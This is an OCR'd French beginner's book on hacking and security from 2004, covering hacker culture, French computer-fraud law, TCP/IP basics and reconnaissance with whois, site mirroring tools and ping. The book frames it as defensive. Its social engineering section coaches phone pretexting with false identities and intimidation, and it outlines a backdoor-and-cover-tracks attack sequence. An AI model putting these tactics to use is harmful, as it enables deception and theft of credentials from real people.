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Bienvenue a tous. 

Alors, en premier je vais me presenter rapidement, ensuite je vais vous dire le 
pourquoi de cet ouvrage et. . . . Et bien si vous etes interesse par le hacking dans toute 
sa splendeur (ne vous inquietez pas chuis un malade chuis juste un passionne) vous 
lirez (j 'espere avec joie) cet ouvrage. 

a) qui suis-je ? 

« Lorsque nous nous interrogeons: "Qui suis-je ? ", nous considerons comme allant de soi que I 'on 
est; la seule question est de connaitre qui I 'on est. Nous avons presuppose que nous sommes, cela n'est 
pas conteste, c'est consider e comme allant de soi que nous sommse. Maintenant la seule question est: 
Qui sommes-nous ?. Seule I'identite doit etre connue, le visage doit etre reconnu, mais il est la, 
meconnu mais la. » 

PHRASED 'UN BOUDDHISTE THIBET AIN . 

Alors, je suis un parisien de 17 ans (en 2004). J'ai decouvert l'informatique en 4 eme et 
ca ete comme une drogue (bon. . . vous voyez de quoi je veux parler). En classe de 
3 eme , j'ai decouvert la programmation et le hacking (grace a un ami). . . 
Deux ans ont passe et je suis encore la pour vous presenter l'un de mes plus grands 
projets : cet ouvrage. 

b) cet ouvrage... 

Alors, pourquoi avoir ecrit cet ouvrage ? 
Premierement, par defi. 

Deuxiemement, j ' adhere a la philosophic qui prone la diffusion de certains savoirs. 
Troisiemement, il y a quelques mois, j'ai lu un article qui parlait d'unjeune hacker 
indien de 16 ans qui avait ecrit un livre sur le hacking, je l'ai longuement cherche sur 
les rayons des librairies que j'ai 1' habitude de frequenter et ne l'ayant pas trouve je 
me suis decide a ecrire ce bouquin. 

Et pour finir, j'ai lu un article, il y a quelques mois de cela, disant qu'un pirate devait 
se reconvertir et se mettre du cote de la securite : je me suis done decide a le faire 
(j 'espere que je serait bien plus productif pour la communaute informatique qu'avant) 

Mon but premier etait qu'il soit publie par une maison d' edition, mais voyant la 
lenteur incomparable des editeurs, je me suis decide a le mettre sur internet 
gratuitement. 

En tt cas, j 'espere qu'il apportera de l'aide aussi bien aux hackers (g bien dit hacker et 
pas lamers), qu'aux developpeurs en passant par les administrateurs. . . 



2 



SOMMAIRE 



I Introduction 
l ere partie : les bases 

II Les hackers 

III TCP/IP 

2 eme partie : hacking / securite informatique 

IV Quelques recherches sur la cible 

1) Recherches manuelles 

2) Automatisation des recherches 

V Infiltration, piratage, securisation des systemes 

1) Windows 9x / 2000 / NT / XP 

2) UNIX / LINUX 

VI D'autres techniques de piratage 

1) attaques DoS et DdoS 

2) Buffer Overflow 

3) Detournement de sessions 

4) Format String 

5) Failles specifiques au web 

6) Messageries et cookies 

7) Retrouver ses mots de passes perdus 

8) Sniffing 

9) Spoofing 

10) Virologie informatique 

VII Piratage de composants reseaux 

1) IDS et contournement 

2) Murs pare-feu 

3) Piratage aerien 

4) War Dialing 

VIII Piratage logiciel 

IX Cryptographie 

3 eme partie : programmation 

X Language C 

XI Python 

XII Quelques fonctions de la PCAP 

XIII Winsock(T re partie) 



3 



XIV Winsock (2 eme partie) 

4 eme partie : developpement d'utilitaires de securite 

XV Un crack/patch 

XVI Scanner de ports 

XVII Clients/serveurs TCP et UDP 

XVIII Sniffers 

XIX Virus batch 

5 eme partie : annexes 

XX Principes importants de securite 

XXI Commandes DOS 

XXII Ports utilises par certains troyens 

XXIII Cracking d'un application 

XXIV Challenge de cracking 



4 



5 



Introduction 



La securite informatique, un domaine important a notre epoque est encore trop 
souvent laisse de cote par des entreprises ou des particuliers jusqu'aujour ou ils 
s'apercoivent que leurs systemes ont ete visites par un pirate informatique, que leurs 
donnees confidentielles (logins, mots de passe, informations bancaires, feuilles de 
paie...) ont ete derobees ou copiees, qu'ils etaient espionnes... 

J'ai ecrit ce livre dans le but de fournir un guide des armes necessaires pour la 
securisation des reseaux et des systemes en montrant et expliquant les armes, outils et 
techniques des pirates. II n'a pas la pretention d'etre une reference en la matiere car 
un tel ouvrage ne ferait pas mo ins de 3000 pages et devrait etre mis a jours chaque 
semaine. 

Certaines personnes seront bien sur contre la publication d'un tel ouvrage car elle 
developpe et decrit les techniques qu'utilisent les pirates et peut inciter les lecteurs a 
pirater des systemes. Ils n'ont pas tord. Mais qu'ils sachent que ce livre a pour but 
premier d'aider les internautes et les administrateurs a securiser leurs reseaux et les 
systemes. 

A qui est adresse ce livre 

Ce livre est adresse a toute personne interessee par la securite informatique ou par le 
hacking que l'on dit « ethique ». 

II est aussi adresse aux personnes administrant des reseaux et devant les securiser. Les 
hackers et les professionnels de la securite informatique pourront peut-etre y trouver 
un guide condense des techniques d'attaques sur les reseaux, les systemes, les 
logiciels et sur les systemes cryptographique. 

Comment tirer parti de ce livre 

Cet ouvrage peut etre lu de differentes manieres. 

Certains peuvent le lire comme une histoire, d'autres comme une initiation a la 
securite, ou encore comme un vrai cours de securite informatique (traitant de la 
securite des reseaux, des logiciels, des systemes d' exploitations et des systemes 
cryptographiques) et de developpement reseau. 

Pour ceux qui veulent adopter la derniere methode de lecture, sachez que ce livre 
n'explique que les techniques de piratage et ne detaillent aucune vulnerabilite precise 
(il y a aura par exemple un chapitre sur les vulnerabilite du type depassements de 
tampon et comment les exploiter generalement, par contre il n'y aura pas de passage 
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expliquant des failles specifiques comme celle qui touche une version de ssh et qui 
peut permettre d'avoir les pouvoirs root du serveur vulnerable). 

Organisation du livre 
Partie I : Les bases 

■ Qui sont vraiment ces hackers ? 

■ TCP/IP 

Partie II : Hacking/Securite informatique 

■ Faire des recherches sur la futur cible, 

■ Infiltrer, pirater et securiser les systemes d'exploitations, 

■ Techniques avancees de piratage, 

■ Piratage de composants reseaux, 

■ Piratage logiciel, 

■ Cryptographie. 

Partie III : Programmation reseau 

■ Le language C et le language Python, 

■ Fonctions de la PCAP, 

■ Winsock. 

Partie IV : Developpement d'outils de securite 

■ Un crack/patch, 

■ Scanner de ports basique, 

■ Clients/serveurs TCP et UDP basiques, 

■ Sniffers, 

■ Virus batch. 
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Partie V : Annexes 

■ Principes de securite, 

■ Commandes DOS, 

■ Ports utilises par certains troyens, 

■ Cracking d'un application, 

■ Challenge de cracking. 
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Partie I : Les bases 
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Les hackers 
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Les hackers ne sont pas seulement ces delinquants du web, comme le montrent les 
medias, qui passent leurs journees a pirater des systemes et des logiciels dans le but 
de faire couler des societes ou de miner l'economie. Certes certains pirates aiment 
detruire et piller des donnees confidentielles dans un but de defi, pour de l'argent ou 
pour le plaisir. Mais il ne faut pas faire d'amalgame : tous les hackers ne sont pas 
comme cela. 

Mais alors qui sont ces hackers ? et comment s'organisent-ils ? 

La « famille » des hackers est bien structuree : 

en premier, il y a les newbies (debutants) : ce sont generalement des 
adolescents fascines par les exploits de certains hackers et qui se sont mis 
a apprendre tout ce qu'ils pouvaient dans le domaine de l'informatique. 
ensuite, il y a les intermediaries, anciens newbies qui ont acquis une 
somme de connaissances en securite informatique, programmation et sur 
les reseaux. 

puis il y a les Whites Hat Hackers, des elites en hacking qui programment 
a longueur de journee et ne font que rechercher des failles dans les 
systemes, logiciels... 

Ces 3 precedents membres de la famille des hackers travaillent pour une amelioration 
de la structure. 

Maintenant, voyons d'autres membres de la famille des hackers qui travaillent dans le 
« cote obscur » du hacking. lis preferent profiter des failles et les exploitent pour le 
plaisir ou pour de l'argent : 

il y a, en premier, les lamers, des etres d'une nullite inimaginable, ne 
faisant qu'utiliser des programmes tout fait (surtout des logiciels servant a 
faire du nuke, du mail bombing. . .) et qui n'arretent pas de se vanter d'etre 
les meilleurs pirates du monde, d'avoir penetre des systemes comme ceux 
de la NASA, des gouvernements. . . On les retrouve surtout sur IRC et 
ICQ. 

ensuite, il y a les Blacks Hat Hackers, des elites qui preferent detruire tout 
systeme qui leur tombent sous la main. 

Voici maintenant d'autres membres que Ton ne peut classer avec les autres : 

les phreakers : ce sont des personnes s'infiltrant dans les systemes 
telephoniques. Forts de leurs connaissances dans les reseaux 
telephoniques commutes et en electronique, ils peuvent construire des 
systemes electroniques (appeles « Box ») ayant des fonctions bien 
definies comme avoir la possibility de telephoner a l'autre bout de la terre 
sans debourser d'argent , de telephoner sur le compte d'une entreprise. . . 
les crackers : ce sont des personnes piratant les logiciels payants de facon 
a pouvoir les utiliser indefiniment sans depenser d'argent. Ce sont des 
elements importants a mes yeux, car certains aiment aussi trouver des 
failles dans les logiciels. 
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les hacktivistes : ce sont des hackers utilisant leurs connaissances pour 
defendre ce en quoi il pensent et se battre pour un but (les droits de 
rhomme, la non commercialisation de l'lnternet. . .). 



Quels sont les competences de base des hackers ? 

Comme nous venons de le voir, il existe une grande variete de hackers, ayant chacun 
leurs domaines de predilection; mais avant de se specialises il faut generalement : 

savoir programmer sinon on ne peut etre ni un hacker ni un informaticien. 

II faut au moins connaitre deux languages dans cette liste : C++, Java, 

Perl, Python, Rebol, Assembleur, Lisp, Scheme, Delphi et Visual Basic 

en plus du C et de l'HTML (qui est plus un language de mise en page). 

connaitre les technologies des reseaux (principes de base, services. . .), la 

pile de protocoles TCP / IP et tout ce qui s'y rapporte. 

savoir utiliser Internet : faire des recherches intelligentes et precises. 

connaitre les principes de base et savoir utiliser les systemes 

d'exploitation les plus courants : Windows, Unix, Linux. 

avoir des bases en electronique et en hardware pour savoir identifier un 

materiel quelconque. 



La loi 

Maintenant voyons ce que dit la loi au sujet du piratage informatique. 



Loi n° 88-19 du 5 janvier 1988 
relative a la fraude informatique 

Journal officiel du 6 janvier 1988 

L'assemblee nationale et le Senat ont adopte. 
Le president de la Republique promulgue la loi dont la teneur 

suit : 

Article unique 

Dans le titre II du livre III du code penal, il est insere, 
apres le chapitre II, un chapitre III ainsi redige: 

Chapitre III 

De certaines infractions en matiere informatique 

Article 4 62-2 

Quiconque, f rauduleusement , aura accede ou se sera maintenu 
dans tout ou partie d'un systeme de traitement automatise de 
donnees sera puni d'un emprisonnement de deux mois a un an et 
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d'une amende de 2 000 F a 50 000 F ou de l'une de ces deux 

peines . 

Lorsqu'il en sera resulte soit la suppression ou la 
modification de donnees contenues dans les systeme, soit une 
alteration du f onctionnement de ce systeme, 1 ' emprisonnement 
sera de 2 mois a 2 ans et 1 ' amende de 10 000 F a 100 000 F. 

Article 462-3 

Quiconque aura, intentionnellement et au mepris des droits 
d'autrui, entrave ou fausse le f onctionnement d'un systeme de 
traitement automatise de donnees sera puni d'un emprisonnement 
de trois mois a 3 ans et d'une amende de 10 000 F a 100 000 F 
ou de l'un de ces deux peines. 

Article 4 62-4 

Article 462-4 : Quiconque aura, intentionnellement et au 
mepris des droits d'autrui, directement ou indirectement, 
introduit des donnees dans un systeme de traitement automatise 
ou supprime ou modifie les donnees qu'il contient ou leurs 
modes de traitement ou de transmission sera puni d'un 
emprisonnement de 3 mois a 3 ans et d'une amende de 2000 F a 
500 000 F ou de l'une de ces deux peines. 

Article 462-5 

Quiconque aura procede a la falsification de documents 
inf ormatises, quelle que soit leur forme, de nature a cause un 
prejudice a autrui, sera puni d'un emprisonnement d'an a cinq 
ans et d'une amende de 20 000 F a 2 000 000 F. 

Article 4 62-6 

Quiconque aura sciemment fait usage des documents vises par 
l'article 462-5 sera puni d'un emprisonnement d'un an a cinq 
ans et d'une amende 20 000 F a 2 000 000 F ou de l'une de ces 

deux peines 

Article 4 62-7 

La tentative des delits prevus par les articles 462-2 a 462-6 
est punie des memes peines que le delit lui-meme. 

Article 462-8 

Quiconque aura participe a une association formee ou a une 
entente etablie en vue de la preparation, concretisee par un 
ou plusieurs faits materiels, d'une ou plusieurs infractions 
prevues par les articles 462-2 a 462-6 sera puni des peines 
prevues pour 1' infraction elle-meme ou pour 1 ' inf raction la 

plus severement reprimee. 
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Article 4 62-7 



Le tribunal pourra prononcer 
appartenant au condamne et 
infractions prevues 



la confiscation des materiels 
ayant servi a commettre les 
au present chapitre. 



Loi n° 2000-230 du 13 mars 2000 
portant adaptation du droit de la preuve aux technologies 
de 1 ' information et relative a la signature electronique 

L ' Assemblee nationale et le Senat ont adopte, 
Le President de la Republique promulgue la loi dont la teneur 

suit : 

Article l er 

I. - L'article 1316 du code civil devient l'article 1315-1. 

II. - Les paragraphes ler, 2, 3, 4 et 5 de la section 1 du 
chapitre VI du titre III du livre III du code civil deviennent 

respectivement les paragraphes 2, 3, 4, 5 et 6 . 
III. - II est insere, avant le paragraphe 2 de la section 1 du 
chapitre VI du titre III du livre III du code civil, un 
paragraphe ler intitule : « Dispositions generates », 
comprenant les articles 1316 a 1316-2 ainsi rediges : 
« Art. 1316. - La preuve litterale, ou preuve par ecrit, 
resulte d'une suite de lettres, de caracteres, de chiffres ou 

de tous autres signes ou symboles dotes d'une signification 
intelligible, quels que soient leur support et leurs modalites 

de transmission. 
« Art. 1316-1. - L'ecrit sous forme electronique est admis en 

preuve au meme titre que l'ecrit sur support papier, sous 
reserve que puisse etre dument identifiee la personne dont il 
emane et qu'il soit etabli et conserve dans des conditions de 
nature a en garantir l'integrite. 
« Art. 1316-2. - Lorsque la loi n'a pas fixe d'autres 
principes, et a defaut de convention valable entre les 
parties, le juge regie les conflits de preuve litterale en 
determinant par tous moyens le titre le plus vraisemblable , 
quel qu'en soit le support. » 

Article 2 

L'article 1317 du code civil est complete par un alinea ainsi 

redige : 

« II peut etre dresse sur support electronique s ' il est etabli 
et conserve dans des conditions fixees par decret en Conseil 

d'Etat. » 

Article 3 

Apres l'article 1316-2 du code civil, il est insere un article 
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1316-3 ainsi redige : 
« Art. 1316-3. - L'ecrit sur support electronique a la meme 
force probante que l'ecrit sur support papier. » 

Article 4 

Apres 1 'article 1316-3 du code civil, il est insere un article 

1316-4 ainsi redige : 
« Art. 1316-4. - La signature necessaire a la perfection d'un 
acte juridique identifie celui qui 1' appose. Elle manifeste le 
consentement des parties aux obligations qui decoulent de cet 
acte. Quand elle est apposee par un officier public, elle 
confere 1 ' authenticity a l'acte. 
« Lorsqu'elle est electronique, elle consiste en l'usage d'un 

procede fiable d' identification garantissant son lien avec 
l'acte auquel elle s' attache. La fiabilite de ce procede est 

presumee, jusqu'a preuve contraire, lorsque la signature 
electronique est creee, 1 ' identite du signataire assuree et 
l'integrite de l'acte garantie, dans des conditions fixees par 

decret en Conseil d'Etat 

Article 5 

A 1 'article 1326 du code civil, les mots : « de sa main » sont 
remplaces par les mots : « par lui-meme ». 

Article 6 

La presente loi est applicable en Nouvelle-Caledonie , en 
Polynesie frangaise, a Wallis-et-Futuna et dans la 

collectivite territoriale de Mayotte. 
La presente loi sera executee comme loi de l'Etat. 
Fait a Paris, le 13 mars 2000. 



Voici un autre article de la loi qui est des fois ajoutee aux precedentes : 

Article 131-39 du code penal 

Lorsque la loi le prevoit a l'encontre d'une personne morale, 
un crime ou un delit peut etre sanctionne d'une ou plusieurs 

des peines suivantes : 

1° La dissolution, lorsque la personne morale a ete creee ou, 

lorsqu'il s ' agit d'un crime ou d'un delit puni en ce qui 
concerne les personnes physiques d'une peine d ' emprisonnement 
superieur a cinq ans, detournee de son projet pour commettre 

les faits incrimines ; 
2° L ' interdiction, a titre definitif ou pour une duree de cinq 
ans au plus, d'exercer directement ou indirectement une ou 

plusieurs activites prof essionnelles ou sociales ; 
3° Le placement, pour une duree de cinq ans au plus, sous 
surveillance judiciaire ; 
4° La fermeture definitive ou pour une duree de cinq ans au 
plus des etablissements ou de l'un ou de plusieurs des 
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etablissements de l'entreprise ayant servi a commettre les 

faits incrimines ; 
5° L'exclusion des marches publics a titre definitif ou pour 
une duree de cinq ans au plus ; 
6° L ' interdiction, a titre definitif ou pour une duree de cinq 
ans au plus, de faire appel public a l'epargne ; 
7° L ' interdiction, pour une duree de cinq ans au plus, 
d'emettre des cheques autres que ceux qui permettent le 
retrait de fonds par le tireur aupres du tire ou ceux qui sont 

certifies ou d'utiliser des cartes de paiement ; 
8° La confiscation de la chose qui a servi ou etait destinee a 
commettre 1' infraction ou de la chose qui en est le produit ; 
9° L'affichage de la decision prononcee ou la diffusion de 
celle-ci soit par la presse ecrite, soit par tout moyen de 
communication audiovisuelle . 

Les peines deifinies au 1° et 3° ci-dessus ne sont pas 
applicables aux personnes morales de droit public dont la 
responsabilite penale est susceptible d'etre engagee. Elles ne 
sont pas non plus applicables aux partis ou groupements 
politiques ni aux syndicats prof essionnels . La peine definie 
au 1° n'est pas applicable aux institutions representatives du 

personnel . 



Avant de passer au vif du sujet, vous devez savoir comment se deroule le piratage 
dun systeme. 

Si le mot « piratage » vous fait peur ou vous gene, dites-vous bien qu'avant de 
securiser un systeme, il faut toujours faire des tests de penetration (appeles Pen-Test) 
pour cibler les failles. . . 

De plus pour contrer efficacement une personne, il faut soit penser comme elle, soit 
connaitre ses limites : cela s'applique aussi aux pirates informatique et la 
connaissance de leurs limites passe par la connaissance des techniques de piratage. 

En gros pour securiser un systeme, il faut se mettre a la place d'un pirate. 

Le deroulement logique d'une attaque commence par la recherche d'informations sur 
le systeme cible aussi bien dans les sources publiques que sur le systeme. 
Puis il va falloir essayer de s'y infiltrer sans etre remarque. 

Arrive a ce point, il faut essayer de trouver des informations qui vont nous permettre 
d'obtenir les droits d'administrateur. 

Enfin il va falloir installer des backdoors (des programmes qui vont nous permettre de 
revenir facilement sur le systeme cible). 

Pour finir il faut masquer et effacer ces faits et gestes sur le systeme. 
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TCP / IP 
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TCP/ IP est une pile de protocoles qui sert a faire communiquer entre elles des 
machines heterogenes. 

le modele OSI : 

En 1984, l'OSI (Open System Interconnect) un ensemble de specifications sur la 
structuration des protocoles et des systemes a ete cree. 

Le modele OSI est constitute de 7 couches (ou niveaux) qui assurent chacunes une 
fonction et integrent un certain nombre de protocoles. 
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Application 


f 


Presentation 


J 


Sesaon 


4 


Transport 


3 


Re'seau 


2 


Liaison lie donnees 


1 


Physique 



Voici une description de chaque couche : 



la couche physique : 

Elle a pour but de transporter des donnees (signaux produits par les systemes et 
devant etre envoyes a d'autres systemes) au travers des divers moyens de transport 
presents dans les reseaux (cables, fibres...). 

la couche liaison de donnees : 

Elle a pour but d'aider a la bonne transmission des donnees entre systemes en creant 
des paquets reseau. Cette couche est constitute de deux sous-couches LLC (Logical 
Link Control) et MAC (Medium Access Control) a ne pas confondre avec une adresse 
MAC (celles des cartes reseaux) bien qu'elle gere l'adressage de ces dernieres ou 
avec le controleur d'integrite de SSL (Message Authentification Code). 

la couche reseau : 
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Elle a pour but de gerer tous les problemes concernant les reseaux (adressage, 
invalidity, indisponibilite...) . 



la couche transport : 

Elle a pour but d'assurer que les systemes communiquent bien entre eux, mais aussi 
que les paquets sont bien transmis. 



la couche session : 

Elle a pour but de controler les liaisons entre les systemes pour qu'ils puissent 
communiquer correctement. Elle ne fait que controler et n'etablit aucune liaison car 
c'est la fonction de la couche transport d'etablir la session, a la demande de la couche 
session. 



la couche presentation : 

Elle a pour but de convertir les donnees fournies par l'utilisateur dans un type de 
donnees ( ou langage) comprehensible par tous les systemes. Un peu comme l'XML 
qui peut servir a un script en PHP qui pourrait envoyer des donnees a un script en 
REBOL. 



la couche application : 

Elle a pour but de permettre a l'utilisateur d'utiliser les services (grace aux protocoles) 
offerts par son systeme. 



Quelques protocoles : 

TCP / IP enveloppe beaucoup de protocoles dont TCP, IP, UDP, ARP, RARP, ICMP, 
IGMP, SNMP, RIP, OSPF, BGP, EGP, DRP, IGRP, EIGRP, NCP, PPP, SMTP, FTP, 
POP/IMAP, DHCP, HTTP, OSPFIGP... 

II existe d'autres piles de protocoles : 
NetBIOS / NetBEUI 

et 

IPX/IPS 
Petites explications : 



IP 



(OSI 3) C'est un protocole gerant l'adressage des paquets envoyes sur le 

reseau 
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Version 


IHL 


Type de 


Longueur du paquet 






service 






Identificateur 


Flags 


Offset du 










Fragment 


TTL 


Protocole 


Cheksum d'en-tete 


Adresse IP source 


Adresse IP cible 


Options / remplissage ( padding ) 


Zones de donnees. . . 



TCP 



( OSI 4 ) C'est un protocole en mode connecte (cela veut dire qu'il 
etablit une connexion entre les systemes qui communiquent). 
II choisit aussi le type de paquets a envoyer sur le reseau en fonction de 
l'environnement et de Faction a effectuer (connexion, deconnexion, 

requetes diverses. . .). 
Quand TCP finit tous ses preparatifs, il envoie ces donnees (on dit 
aussi segments de donnees) au protocole IP. Ce dernier enverra le 
paquet par le reseau. 

Pour assurer sa fonction, TCP utilise differentes techniques, comme : 
le controle des paquets (pour d'eventuelles erreurs) 
la creation d'une connexion virtuelle, entre les systemes en 
communication de type full-duplex (connexion en double-sens) 



Voici un paquet TCP : 





port source 








port destination 


numero de sequence 


accuse de reception 


decalage 
donnees 


reserve 


urg 


ack 


psh 


rst 


syn 


fin 


fenetre 


somme de controle (checksum) 


pointeur de donnees urgentes 


options 


remplissage (padding) 


donnees 




( OSI 4 ) C'est un protocole en mode deconnecte semblable a TCP mais 
etant moins securise et plus simple d'utilisation, car il ne cree pas de 
connexion entre les systemes qui communiquent et ne fait qu'envoyer 
des datagrammes sur le reseau sans controle des paquets. 

Voici un paquet UDP : 
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Type 


Code 


Cheksum 




ID 


Numero de sequence 


Donnees 



Quelques notions de base : 
Clients/Serveurs : 

De nos jours, les reseaux fonctionnent grace a la topologie client/serveur. 

Le systeme client ouvre une session sur le systeme serveur puis faire de requetes 
specifiques au(x) service(s) que delivre ce dernier. 

Le systeme serveur est developpe pour accepter la connexion d'un des client et 
fournir un/des service(s) specifique(s). 



Pour information, un service n'est fournit que par un serveur et peut-etre de types 
differents : service http, ftp... 



Sockets : 

Pour faire communiquer des systemes a travers le reseau, des chercheurs ont cree ce 
que Ton appelle des sockets. 

Maintenant quoi que l'on fasse sur un reseau, on utilise sans le savoir (ou plutot sans 
s'en preoccuper) des sockets. 



Pour information, les sockets sont principalement constitues d'une adresse IP et d'un 
port de communication. 
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Par tie II : 
Hacking / Securite 
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Quelques recherches sur 

la cible 
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Sources publiques 



whois : 

Les whois sont des services proposes gratuitement en ligne et qui permettent 
d'obtenir des informations sur un domaine particulier, sur une adresse de messagerie. 
Grace a ses bases de donnees comme : 

•whois.ripe.net : qui s'occupe d'attribuer des adresses IP pour l'Europe. 

• whois.apnic.net : qui s'occupe d'attribuer des adresses IP pour l'Asie 

Pacifique. 

•whois.nic.mil : qui gere l'attribution des adresses IP des systemes 
militaires americains. 

•whois.nic.gov : qui gere l'attribution des adresses IP des systemes du 
gouvernement americain. 
•l'internic : le plus connu. 

La liste n'est pas finie, mais vous pouvez facilement en trouver d'autres sur Internet 
grace a google. 

Pour obtenir les informations donnees par un whois, vous pouvez choisir d'utiliser la 
commande whois de Unix, des programmes comme WS Ping Pro Pack, ou vous 
pouvez aller sur un site proposant une base de donnees de recensement des noms de 
domaine. 



les groupes de discussions : 

Les groupes de discussions (newsgroups) permettent d' avoir des informations 
techniques par d'autres utilisateurs sur un sujet precis. Ces newsgroups fonctionnent 
generalement comme un forum ou Ton poste des messages en y laissant une adresse 
mail personnelle pour qu'on puisse identifier les messages. Maintenant interessont- 
nous au protocole qui permet de poster des messages sur ces newsgroups. Ce 
protocole s'appelle NNTP (Network News Transfer Protocol) et utilise le port TCP 
119. 

Vous allez me dire quel rapport entre la recherche d'informations sur la cible et 
l'exploration des newsgroups. Imaginez qu'un poste du domaine cible demande des 
informations sur un newsgroup et maintenant imaginez que ce soit l'administrateur du 
reseau qui demande des informations sur la configuration des systemes pour le 
reseau. Bien sur, ce serait le reve pour un pirate car il pourrait savoir en temps reel ce 
que l'administrateur veut et recherche. Malheureusement ces situations se passent 
plus souvent qu'on puisse le croire. 
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le site de la cible : 



Si la cible a un site, vous devez le parcourir a la recherche d'adresses mails et d'autres 
informations precieuses. Ne pas hesiter a parcourir le code source des pages dans le 
but de recenser des commentaires, ou des caracteristiques qui pourraient permettre de 
remonter aux developpeurs. 

Les aspirateurs de sites permettent d'automatiser ces recherches, en voici une liste: 




Nom du logiciel : 


Teleport pro 


OS vises : 


NT/95/98/2000/ME/XP 


Licence : 


demo 


Editeur ou Auteur : 


Tenmax 


Le but du logiciel : 


Tres bon aspirateur de sites web, qui va 
dupliquer le site sur le disque dur et que 
Ton va pouvoir visiter hors ligne. Permet 
aussi de rapatrier des fichiers specifiques 
(comme les fichiers videos. . . ou les pages 
contenant un certain mot). 
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Nom du logiciel : 


HTTrack 


OS vises : 


NT/95/98/2000/ME/XP 


Licence : 


freeware 


Editeur ou Auteur : 


Xavier Roche & Yann Philippot 


Le but du logiciel : 


Un tres bon aspirateur qui permet de 
recuperer tous les fichiers d'un site. 11 
permet aussi de mettre a jour un site deja 
existant sur notre disque dur, faire des 
copies miroir d'un site deja en ligne. . . 




Nom du logiciel : 


WebCopier 


OS vises : 


NT/95/98/2000/ME/XP 


Licence : 


shareware 


Editeur ou Auteur : 


MaximumSoft Corp. 


Le but du logiciel : 


C'est un autre aspirateur de sites web. 




Nom du logiciel : 


SmartBud 


OS vises : 


NT/95/98/2000/ME 


Licence : 


freeware 


Editeur ou Auteur : 


Atom e-City Ltd. 


Le but du logiciel : 


Un superbe aspirateur de sites webs, qui a 
enormement de qualites (en faites , je ne 
lui trouvons aucun defaut) que vous devez 
decouvrir. 


Pour plus de logiciels , allez sur la page : 


ittp://www.idf.net/info/table.html. 


Pour information, le code PHP d'une page n'est pas visible car il est interprets. 
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divers : 



Les pages jaunes peuvent etre une tres bonne documentation de base pour avoir 
certaines informations sur l'entreprise ou un particulier comme des numeros de 
telephone qui vous permettront de lancer des attaques sur le reseau telephonique. 

La presse pourrait aussi vous donner des informations utiles sur les entreprises 
comme leur politique de securite a partir d'un interview d'un des employes et pleins 
d'autres informations, mais cela depend bien sur de l'entreprise, de son domaine 
d'application, de sa renommee. . . 

Si votre cible est cotee en Bourse, fusionne, rachete, creer des filiales, vous pouvez 
acceder a ces informations qui sont toutes stockees dans des bases de donnees comme 
celle de Edgar de Sec. ( qui se situe a l'adresse http://www.sec.gov). 

les moteurs de recherche et les agents intelligents : 

La principale arme du pirate est l'information. II se doit done de savoir utiliser les 
outils de recherche d'informations sur Internet (les moteurs de recherche et les agents 
intelligents) : il doit done apprendre a manier les mots cles qui lui permettront 
d'acceder a des documents. 



social engeneering et trashing : 

Le social engeneering n'est pas une technique de piratage mais une technique 
millenaire servant a se faire passer pour une autre personne grace a la parole. 

Cette technique est tres souvent utilisee par les pirates dans le but d'obtenir des 
identifiant, des mots de passe, des numeros de cartes de credit ou pour que les 
personnes contactees executent ou fournissent ce qu'ils recherchent. 

Vous allez prendre connaissances de quelques conseils pour reussir une attaque de 
type ingenierie sociale. 

• se preparer a l'avance, en marquant sur une feuille les questions a 
poser et votre fausse identite, 

• s'entrainer a changer de voix, 

• ne jamais raccrocher brutalement au nez de votre interlocuteur, 
meme s'il ne veut pas executer vos volontes, 

• toujours faire des recherches sur 1 'entreprise pour ne jamais etre 
pris au depourvu au telephone, 

• ne jamais tourner autour du pot toujours aller droit au but, 

• ne pas trop parler pour qu'il puisse vous devoiler les informations 
voulues 
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• eviter les onomatopees du genres : heu. . . , he in ! . . . , on. . . , je sais pas 
.... car vous ne paraissez pas sur de vous. 

• faire le « psychologue » en adoptant un ton different en fonction de 
la personne etant a l'autre bout du combine. Comme la peur en 
faisant comprendre a la personne qu'elle va s'attirer les coleres du 
patron ou subir des actions indesirables comme des coupures 
d'electricite , avoir la visite du fisc, de 1' AD API. . . ou sinon lui 
montrer que si elle accepte de faire ce que vous lui demander, elle 
vous faciliterait grandement la vie. 

• ne pas insulter les personnes ou la forcer a faire ce qu'elle ne veut 
pas faire mais plutot essayer de savoir ce qui la gene. 

• garder son controle jusqu'a la fin. 

• ne pas s'enerver. 

• toujours remercier la personne meme si elle n'a pas satisfait vos 
attentes 

• mettre des bruits de fond comme dans un bureau (bien sur cela 
depend du contexte dans lequel vous vous trouvez). 

• avoir beaucoup d'imagination, cela peut servir car repeter le meme 
scenario plusieurs fois conduit un echec total. 

Le trashing consiste a faire les poubelles de la cible dans le but de trouver des 
informations interessantes (vous ne vous imaginez pas ce que Ton peut y trouver si on 
a de la chance) comme le social enginneering, cette technique n'est pas specifique au 
piratage mais peut grandement aider. 

Parades : 

II n'y a pas de parade a ceci car vous ne pouvez controler faeces a ces informations et 
si vous donner de fausses informations vous ne respecter plus les chartes done donner 
a chaque fois que le strict minimum. En ce qui concerne l'ingenierie sociale, formez 
le personnel, en leur expliquant qu'ils doivent, par exemple, contacter un des chef 
lors de ce genre d'appel avant de donner des informations. 
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Utilitaires et outils automatises 



ping : 

Un ping est une fonction importante car elle permet de savoir si une adresse IP est 
attribuee, elle va aussi permettre de savoir ou est situee la personne a qui appartient 
TIP et aussi de connaitre le fournisseur d'acces de la cible grace a l'option de 
resolution l'adresse IP en nom d'hotes. On peut « pinger » des machines grace a des 
logiciels comme : nmap, Pinger de Rhino9 , Ping Sweep de SolarWind, WS Ping 
ProPack de Ipswitch , et les outils netscan. il existe plein d'autre mais se sont les plus 
connus. 

Les interpreteurs de commandes integrent aussi une commande ping . Voici quelques 
options sous MS-DOS : 

• -t : qui envoie des requetes « ping » sur l'hote jusqu'a 
qu'une personne interrompe cela a l'aide de CTRL + C 

• -a : qui permet de resoudre une adresse IP en nom 
d'hote 

• -i x : qui permet de determiner le TTL des paquets 
ping (x doit etre compris entre 1 et 255) 

• -nx : qui permet d'envoyer un nombre determine de 
paquet ICMPECHOREQUEST. 

Ce sont les options les plus importantes de la commande Ping sous MS-DOS. 



Pour information la commande Ping envoi des paquets et grace protocole 
ICMP ECHO REQUEST et recoit des paquets de type ICMP ECHO REPLY. 



Exemple 
d'utilisation 
de la 

commande 
ping sous 
windows : 



Invite de commandes 


-|n| 


X 


Microsoft Windows 2000 [Uersion B .00.2195 1 
<C> Copyright 1985-1999 Microsoft Corp. 






C:\>ping 81.56.H.H 






Envoi d'une requete 'ping' sur 81.56.1B.^B auec 32 octets de donnees : 






Reponse de 81.56.^I.^M : octets=32 tenps=110 ns TTL=125 
Reponse de 81.56.^B.^B : octets-32 tenps-HB ns ITL=125 
Reponse de 81.56.^B.|B : octets=32 tenps=110 ns ITL=125 
